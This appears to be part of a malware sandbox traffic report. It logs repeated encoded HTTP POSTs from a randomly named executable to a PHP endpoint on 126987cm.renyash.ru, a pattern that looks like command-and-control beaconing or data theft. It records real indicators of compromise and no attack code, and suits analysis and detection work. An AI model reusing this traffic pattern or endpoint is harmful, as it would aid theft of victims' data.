                                                                                                                                Data Ascii: TS[_SDYS]V[WTYQXXPX\[^WCVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!32'X !.5-?_$-_!;(+06& T00*[)(>7&!^&%X*3
                                                                                                                                Jan 1, 2025 21:47:49.589566946 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:49.861120939 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:49 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=weVQ57YvXfPZ4YNsUXIYcEesAjoCBW0fOMRWAqWdsI8lbSl2XmmewFcJKplLqDMKvh1pSB3qWXUxKMEuDXztN1BTqkJNmtR0F5hD61D3HMPWnA%2BEcgHqwfS6vFiI%2FkJ%2BnB2Mc7NM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ddea86c43a5-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2199&min_rtt=1749&rtt_var=1556&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=272897&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                30 | 192.168.2.4 | 49771 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:47:50.042603970 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:50.389770031 CET | 1072 | OUT | Data Raw: 54 56 5b 57 56 4b 5c 56 5d 56 5b 57 54 5d 51 53 58 51 58 5a 5b 5f 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TV[WVK\V]V[WT]QSXQXZ[_WDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["3 7![5>$'+#+'S(B;P#%,30)%%>=;&*!^&%X*#
                                                                                                                                Jan 1, 2025 21:47:50.492729902 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:50.771249056 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:50 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wLE1WUMfjPWtb6ACKDhkHqz9XP17fTsVGWagcIbEUAZWznfoubm%2FmxG3SDf7Op621qbjrEg4o95SX0EeFFmqUbDL%2Fu80Tf2OmVqhghph2IooAt%2F7i944arxd640u%2FCWVOsdfzT1m"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55de44a6f4406-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3412&min_rtt=1559&rtt_var=4290&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=89116&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                31 | 192.168.2.4 | 49773 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:47:50.891716957 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                32 | 192.168.2.4 | 49774 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:47:50.990123034 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:51.342860937 CET | 1788 | OUT | Data Raw: 51 52 5e 50 53 44 59 50 5d 56 5b 57 54 5a 51 53 58 50 58 51 5b 53 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QR^PSDYP]V[WTZQSXPXQ[SWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!&1,419\638!;U?;P6%$02=%:?-([&:!^&%X*?
                                                                                                                                Jan 1, 2025 21:47:51.499819040 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:51.764488935 CET | 959 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:51 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=thtGpKwoJUB%2FvU%2FYxULUGFoElmm0MD7enCYQW0QOSkuj9CJ1mryglkaiOt%2Bp7dbTj6FalqdFT%2FOtDV%2B5R1FnQXhKgSe%2FuUK85XfynWAN9mzeq4v4gnyl3D3upH818BI4FrDmNFFf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55dea9fb2424c-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4517&min_rtt=1608&rtt_var=6421&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=58674&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49775 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:51.112231016 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:47:51.467834949 CET | 1072 | OUT | POST body
Jan 1, 2025 21:47:51.587651968 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:51.850878000 CET | 801 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:51 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=evVvjlPweotxSg5hMSEw%2Bo7KRwKQ2SJuo8FKgGE5AKML55a1swWOBpYjxgSKB904De8EOsRj2MAIXRxMbkquK8gpxMmix94XAKB8jFTjUCWv9XFHywTzA1i3OKCXUb2nZLLwSNPs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55deb2fc67cb1-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3291&min_rtt=1821&rtt_var=3624&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=107455&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49776 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:51.969460964 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
Jan 1, 2025 21:47:52.327572107 CET | 1072 | OUT | POST body
Jan 1, 2025 21:47:52.421494961 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:52.692080021 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:52 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LRX3Cp%2FrVhqZnvVRaHxw39gzi40axkeDuYJmLh%2BCSxYqbE5gC13Ghsb19RsyoqJdc%2BCeXcqWpZgxUSlNgNoFrYquy7667u6Sen3lZQtIlI7EDcU4hWRhOgLlIV29m7jlRRttI%2FdA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55df05eb64263-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4666&min_rtt=1728&rtt_var=6525&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=57853&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49777 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:52.958625078 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:47:53.314246893 CET | 1072 | OUT | POST body
Jan 1, 2025 21:47:53.430330992 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:53.601663113 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:53 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WC%2F5qIyhNuwnEdI1l5qpUnPjcKajtbSmHmczX%2Fu1PFUXA5qabDWfbBjcEjFjmpBGjudhnIkef8C3yfhcLnUQa2BKgaPbHwzBhm2W0ssalViVVeni7IOvwSkANX6ceAQcwS%2B977V5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55df69d404326-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3915&min_rtt=1585&rtt_var=5254&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=72184&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49778 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:53.862956047 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:47:54.217885017 CET | 1072 | OUT | POST body
Jan 1, 2025 21:47:54.307132006 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:54.575320959 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:54 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3FMNqCHSOFSdp1jbR8HXs1D8u5%2F6lpEWc4%2FghheNl09CYDWqiIYBqSu0SduC9kB6KHFMWUbmuJQ65XcBmyyIvWpR5Y%2FtBbdzq%2FdH8Cgx4Nh%2FFLigx1mAk4ZpatyA4lulEFiWmzqO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55dfc1bb90f46-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=1679&rtt_var=1310&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=331742&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49780 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:54.703042984 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:47:55.062002897 CET | 1072 | OUT | POST body
Jan 1, 2025 21:47:55.165779114 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:55.432388067 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:55 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1dnD0%2BC0XNvMurUHd8RkxZSpTS5X4sgOOpOLUKAImv18ldvctGKIWlru0RcQeGOYMput5yDZ%2BWtRxwGUtVDB6fg6VpijmUMsfX%2F65YkLSf0jjPlrbXYuMTa1CShEglXGa1gyv5no"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e017d4ac346-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7612&min_rtt=1752&rtt_var=12377&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=30020&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49786 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:55.621249914 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:47:55.967976093 CET | 1072 | OUT | POST body
Jan 1, 2025 21:47:56.090771914 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:56.268455029 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:56 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CoFnNYd4SR3o6t9QPOEZYj0Ip98ixF6KdWorJNyjf0fesx1g3pgahqIsXX7T9j%2B8rH7Ms%2Fud3c1ChfaQpG34FXnoT3jXa2MpJbBBdiYNzat1dgpdY9rvDjN7%2F5ChGll%2BEYh0hP8b"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e0738bf4235-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7297&min_rtt=1582&rtt_var=12024&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=30863&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49792 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:56.391701937 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:47:56.749160051 CET | 1072 | OUT | Data Raw: 54 54 5b 52 56 4b 5c 51 5d 56 5b 57 54 55 51 5a 58 54 58 5b 5b 5f 57 45 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TT[RVK\Q]V[WTUQZXTX[[_WEVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!^'2+_4""='0=(^6#(3T!64'2=5D(Y&*!^&%X*


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49798 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:56.787184000 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1764
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:47:57.139745951 CET | 1764 | OUT | Data Raw: 54 5e 5b 5e 56 45 59 55 5d 56 5b 57 54 5b 51 5d 58 53 58 51 5b 54 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T^[^VEYU]V[WT[Q]XSXQ[TWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!'?X#!%Y68$#6?T*'865$R$0*5!>-?%!^&%X*
Jan 1, 2025 21:47:57.235243082 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:57.512482882 CET | 953 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:57 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OOvVWdbWH6npDwZCLB0JvplyT449ROKwRtVtddDTPCN3oitAmB7SgnFlFoixoHA51%2B8dptYaQw6m%2FqAdgaCJ5JV%2B8fJt2vgqNECMaNwt4YQ3SkrLpMelwF4SSobNuaQbarYKlrcg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e0e69b17291-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4534&min_rtt=1883&rtt_var=6009&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2109&delivery_rate=63211&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 22 0e 3f 26 23 57 34 22 0b 55 28 2b 33 1c 24 31 3d 05 31 0d 35 41 2b 06 02 00 3f 3c 38 16 26 12 27 05 27 29 2a 0f 2b 32 38 11 29 0c 20 5c 05 1b 39 17 24 5f 30 01 24 2b 29 1d 29 09 34 5d 20 2f 22 5a 28 20 2c 50 37 5e 22 01 25 2b 3a 0c 30 5c 22 55 2b 2c 20 07 28 33 24 0f 26 3d 2a 51 0f 16 3b 0d 3d 33 2e 5a 2a 2c 24 11 27 32 34 58 22 35 3d 50 24 28 2b 56 27 5c 3d 02 2b 10 3f 14 21 30 3f 1f 31 2c 25 07 26 2e 0e 0d 2d 3a 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
